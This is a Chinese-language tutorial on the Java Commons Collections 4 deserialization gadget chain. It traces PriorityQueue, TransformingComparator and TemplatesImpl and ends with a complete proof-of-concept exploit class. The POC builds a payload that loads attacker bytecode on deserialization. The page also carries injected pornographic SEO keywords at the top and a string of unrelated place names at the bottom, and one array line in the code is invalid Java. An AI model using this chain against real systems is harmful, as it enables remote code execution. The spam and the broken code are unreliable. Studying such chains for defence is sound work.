最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

java安全之CommonsCollections4詳解

 更新時(shí)間:2022年08月17日 16:41:56   作者:XINO  
這篇文章主要介紹了java安全之CommonsCollections4詳解

引子

CC4簡單來說就是CC3前半部分和CC2后半部分拼接組成的,對于其利用的限制條件與CC2一致,一樣需要在commons-collections-4.0版本使用,原因是TransformingComparator類在3.1-3.2.1版本中還沒有實(shí)現(xiàn)Serializable接口,無法被反序列化。

接下來讓我們仔細(xì)分析一下。

PriorityQueue

PriorityQueue是一個(gè)優(yōu)先隊(duì)列,作用是用來排序,重點(diǎn)在于每次排序都要觸發(fā)傳入的比較器comparator的compare()方法 在CC2中,此類用于調(diào)用PriorityQueue重寫的readObject來作為觸發(fā)入口

PriorityQueue中的readObject間接調(diào)用了compare() 而compare()最終調(diào)用了transform()

readobject()方法

private void readObject(java.io.ObjectInputStream s)
    throws java.io.IOException, ClassNotFoundException {
    // Read in size, and any hidden stuff
    s.defaultReadObject();
    // Read in (and discard) array length
    s.readInt();
    queue = new Object[size];
    // Read in all elements.
    for (int i = 0; i < size; i++)
        queue[i] = s.readObject();
    // Elements are guaranteed to be in "proper order", but the
    // spec has never explained what that might be.
    heapify();
}

重寫了該方法并在最后調(diào)用了heapify()方法,我們跟進(jìn)一下:

private void heapify() {
    for (int i = (size >>> 1) - 1; i >= 0; i--)
        siftDown(i, (E) queue[i]);
}

這里的話需要長度等于2才能進(jìn)入for循環(huán),我們要怎樣改變長度呢。

這里用到的是該類的add方法,將指定的元素插入此優(yōu)先級隊(duì)列。

heapify()調(diào)用了siftdown()方法

繼續(xù)跟進(jìn):

private void siftDown(int k, E x) {
    if (comparator != null)
        siftDownUsingComparator(k, x);
    else
        siftDownComparable(k, x);
}

可以看到判斷條件

 if (comparator != null)

調(diào)用了

siftDownUsingComparator(k, x);

在siftDownUsingComparator()又調(diào)用了 comparator.compare()。

TransformingComparator

可以看到該類在CC3的版本中不能反序列化,在CC4的版本中便可以了。

TransformingComparator是一個(gè)修飾器,和CC1中的ChainedTransformer類似。

TransformingComparator里面存在compare方法,當(dāng)我們調(diào)用時(shí)就會調(diào)用傳入transformer對象的transform方法具體實(shí)現(xiàn)是this.transformer在傳入ChainedTransformer后,會調(diào)用ChainedTransformer#transform反射鏈。

問題

1.就像剛才heapify里面所說的

private void heapify() {
    for (int i = (size >>> 1) - 1; i >= 0; i--)
        siftDown(i, (E) queue[i]);
}

我們要進(jìn)入循環(huán)要修改值,通過add方法。

priorityQueue.add(1);
priorityQueue.add(2);

2.initialCapacity的值要大于1

3.comparator != null

4.通過反射來修改值防止在反序列化前調(diào)用,就如之前的鏈一樣,我們到利用時(shí)再用反射修改參數(shù)。

類似這個(gè)樣子:

Class c=transformingComparator.getClass();
        Field transformField=c.getDeclaredField("transformer");
        transformField.setAccessible(true);
        transformField.set(transformingComparator,chainedTransformer);

我們先放置個(gè)反序列化前不會執(zhí)行這條鏈的隨便一個(gè)參數(shù):

TransformingComparator transformingComparator=new TransformingComparator<>(new ConstantTransformer<>(1));

POC

package ysoserial;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.convert.TransformWriteField;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;
import org.apache.commons.collections4.map.LazyMap;
import org.apache.xalan.xsltc.trax.TrAXFilter;
import javax.xml.crypto.dsig.Transform;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.*;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;
import java.util.PriorityQueue;
public class cc4 {
    public static void main(String[] args) throws Exception {
        TemplatesImpl templates=new TemplatesImpl();
        Class tc=templates.getClass();
        Field nameField=tc.getDeclaredField("_name");
        nameField.setAccessible(true);
        nameField.set(templates,"XINO");
        Field bytecodesField=tc.getDeclaredField("_bytecodes");
        bytecodesField.setAccessible(true);
        byte[] code = Files.readAllBytes(Paths.get("D://tmp/test.class"));
        byte[][] codes=[code];
        bytecodesField.set(templates,codes);
        Field tfactoryField=tc.getDeclaredField("_tfactory");
        tfactoryField.setAccessible(true);
        tfactoryField.set(templates,new TransformerFactoryImpl());
        InstantiateTransformer instantiateTransformer=new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates});
        //
        Transformer[] transformers=new Transformer[]{
            new ConstantTransformer(TrAXFilter.class),
            instantiateTransformer
        };
        ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);
        TransformingComparator transformingComparator=new TransformingComparator<>(new ConstantTransformer<>(1));
        PriorityQueue priorityQueue=new PriorityQueue<>(transformingComparator);
        priorityQueue.add(1);
        priorityQueue.add(2);
        Class c=transformingComparator.getClass();
        Field transformField=c.getDeclaredField("transformer");
        transformField.setAccessible(true);
        transformField.set(transformingComparator,chainedTransformer);
        serialize(priorityQueue);
        unserialize("ser.bin");
    }
    public static void serialize(Object obj) throws Exception{
        ObjectOutputStream oss=new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oss.writeObject(obj);
    }
    public static void unserialize(Object obj) throws Exception{
        ObjectInputStream oss=new ObjectInputStream(new FileInputStream("ser.bin"));
        oss.readObject();
    }
}

結(jié)語

這次給大家?guī)淼氖荂C4鏈的簡單分析,可以看到CC4鏈還是沒有脫離之前跟的鏈的影子,我們可以看到CC3的前半部分以及CC2的后半部分,需要注意的問題的話就是版本問題了吧還有上面提到的一些小細(xì)節(jié),至此CC鏈就快跟完了。

以上就是java安全之CommonsCollections4詳解的詳細(xì)內(nèi)容,更多關(guān)于java安全CommonsCollections4的資料請關(guān)注腳本之家其它相關(guān)文章!

相關(guān)文章

  • Spring?Boot?RestController接口輸出到終端的操作代碼

    Spring?Boot?RestController接口輸出到終端的操作代碼

    這篇文章主要介紹了Spring?Boot?RestController接口如何輸出到終端,使用?HttpServletResponse?類,可以在使用curl執(zhí)行?Spring?Boot?REST接口的同時(shí),在控制臺輸出一些信息,給運(yùn)維人員知道當(dāng)前命令執(zhí)行的狀態(tài),感興趣的朋友跟隨小編一起看看吧
    2023-09-09
  • 用Java設(shè)計(jì)模式中的觀察者模式開發(fā)微信公眾號的例子

    用Java設(shè)計(jì)模式中的觀察者模式開發(fā)微信公眾號的例子

    這篇文章主要介紹了用Java設(shè)計(jì)模式中的觀察者模式開發(fā)微信公眾號的例子,這里Java的微信SDK等部分便不再詳述,只注重關(guān)鍵部分和開發(fā)過程中觀察者模式優(yōu)點(diǎn)的體現(xiàn),需要的朋友可以參考下
    2016-02-02
  • java如何根據(jù)IP獲取當(dāng)前區(qū)域天氣信息詳解

    java如何根據(jù)IP獲取當(dāng)前區(qū)域天氣信息詳解

    根據(jù)IP自動獲取當(dāng)?shù)氐奶鞖忸A(yù)報(bào)信息這個(gè)功能大家應(yīng)該都遇到過,天氣預(yù)報(bào)信息用途非常廣泛,篇文章主要給大家介紹了關(guān)于java如何根據(jù)IP獲取當(dāng)前區(qū)域天氣信息的相關(guān)資料,需要的朋友可以參考下
    2021-08-08
  • 一文看懂Mybatis中的延遲加載

    一文看懂Mybatis中的延遲加載

    這篇文章主要介紹了一文看懂Mybatis中的延遲加載,延遲加載也稱為懶加載,是指在進(jìn)行表的關(guān)聯(lián)查詢時(shí),按照設(shè)置延遲規(guī)則推遲對關(guān)聯(lián)對象的select查詢,MyBatis 的延遲加載只是對關(guān)聯(lián)對象的查詢有遲延設(shè)置,對于主加載對象都是直接執(zhí)行查詢語句的,需要的朋友可以參考下
    2023-10-10
  • Java的ThreadContext類加載器的實(shí)現(xiàn)

    Java的ThreadContext類加載器的實(shí)現(xiàn)

    這篇文章主要介紹了Java的ThreadContext類加載器的實(shí)現(xiàn),小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,也給大家做個(gè)參考。一起跟隨小編過來看看吧
    2018-06-06
  • java中多線程加鎖的四種方式

    java中多線程加鎖的四種方式

    Java中實(shí)現(xiàn)多線程安全的關(guān)鍵是加鎖,主要方式有synchronized關(guān)鍵字、ReentrantLock類、ReadWriteLock接口和Semaphore類,本文就來介紹一下這四種方式,感興趣的可以了解一下
    2024-10-10
  • Java中IO流文件讀取、寫入和復(fù)制的實(shí)例

    Java中IO流文件讀取、寫入和復(fù)制的實(shí)例

    下面小編就為大家?guī)硪黄狫ava中IO流文件讀取、寫入和復(fù)制的實(shí)例。小編覺得挺不錯(cuò)的,現(xiàn)在就分享給大家,也給大家做個(gè)參考。一起跟隨小編過來看看吧
    2017-10-10
  • Springboot 如何實(shí)現(xiàn)filter攔截token驗(yàn)證和跨域

    Springboot 如何實(shí)現(xiàn)filter攔截token驗(yàn)證和跨域

    這篇文章主要介紹了Springboot 如何實(shí)現(xiàn)filter攔截token驗(yàn)證和跨域操作,具有很好的參考價(jià)值,希望對大家有所幫助。如有錯(cuò)誤或未考慮完全的地方,望不吝賜教
    2021-08-08
  • 使用 Spring Boot 內(nèi)嵌容器 Undertow創(chuàng)建服務(wù)器的方法

    使用 Spring Boot 內(nèi)嵌容器 Undertow創(chuàng)建服務(wù)器的方法

    Undertow是一個(gè)非常輕量并高性能的web server,它來自 JBoss。支持blocking和non-blocking兩種NIO API。接下來通過本文給大家介紹使用Spring Boot 內(nèi)嵌容器 Undertow創(chuàng)建服務(wù)器的方法,感興趣的朋友一起看看吧
    2017-11-11
  • Java讀取OpenSSL生成的PEM公鑰文件操作

    Java讀取OpenSSL生成的PEM公鑰文件操作

    這篇文章主要介紹了Java讀取OpenSSL生成的PEM公鑰文件操作,具有很好的參考價(jià)值,希望對大家有所幫助。一起跟隨小編過來看看吧
    2020-10-10

最新評論

特克斯县| 蕲春县| 梁河县| 车险| 罗定市| 奎屯市| 钦州市| 台东县| 成武县| 永胜县| 合阳县| 巴林右旗| 仙居县| 宁远县| 宁乡县| 家居| 通道| 铜鼓县| 绿春县| 彭阳县| 沧源| 格尔木市| 彭泽县| 禹州市| 鸡西市| 德惠市| 临洮县| 祁阳县| 公主岭市| 庆安县| 嘉善县| 莱州市| 灌南县| 罗源县| 长子县| 哈密市| 于都县| 宁安市| 塘沽区| 汉川市| 雅江县|